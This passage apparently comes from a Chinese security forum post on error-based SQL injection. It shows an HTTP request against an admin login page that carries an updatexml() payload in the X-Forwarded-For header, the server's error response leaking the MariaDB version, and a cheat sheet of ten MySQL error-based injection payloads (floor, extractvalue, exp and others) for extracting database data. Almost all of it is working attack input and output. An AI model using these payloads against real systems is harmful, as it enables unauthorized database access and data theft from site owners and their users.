- POST /Model/admin/login.php?action=login HTTP/1.1
- Host: XXX.com
- X-Forwarded-For: ' or updatexml(1,concat(0x7e,(version())),0) or'
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Referer: http://XXX.com/Model/admin/login.php
- Cookie: PHPSESSID=i2m9hu9jtm8l4o71hvct9h0h05
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 25
- username=abc&password=123
复制代码 返回包
- HTTP/1.1 200 OK
- Server: kangle/3.5.8.2
- Date: Tue, 11 Apr 2017 03:21:49 GMT
- X-Powered-By: PHP/5.4.45
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Content-type: text/html
- Connection: close
- Content-Length: 540
- 
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />MySQL Query:insert into dg_logs(adminid,admin,type,addtime,ip,memo) values('22','abc','0','1491880909','' or updatexml(1,concat(0x7e,(version())),0) or'','管çåabcç»å½åå°') <br> MySQL Error:XPATH syntax error: '~10.1.16-MariaDB' <br> MySQL Errno:1105 <br> Message:MySQL Query Error
复制代码
1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue() select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); 3.updatexml() select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); 4.geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); 5.multipoint() select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)); 6.polygon() select * from test where id=1 and polygon((select * from(select * from(select user())a)b)); 7.multipolygon() select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b)); 8.linestring() select * from test where id=1 and linestring((select * from(select * from(select user())a)b)); 9.multilinestring() select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b)); 10.exp() select * from test where id=1 and exp(~(select * from(select user())a)); |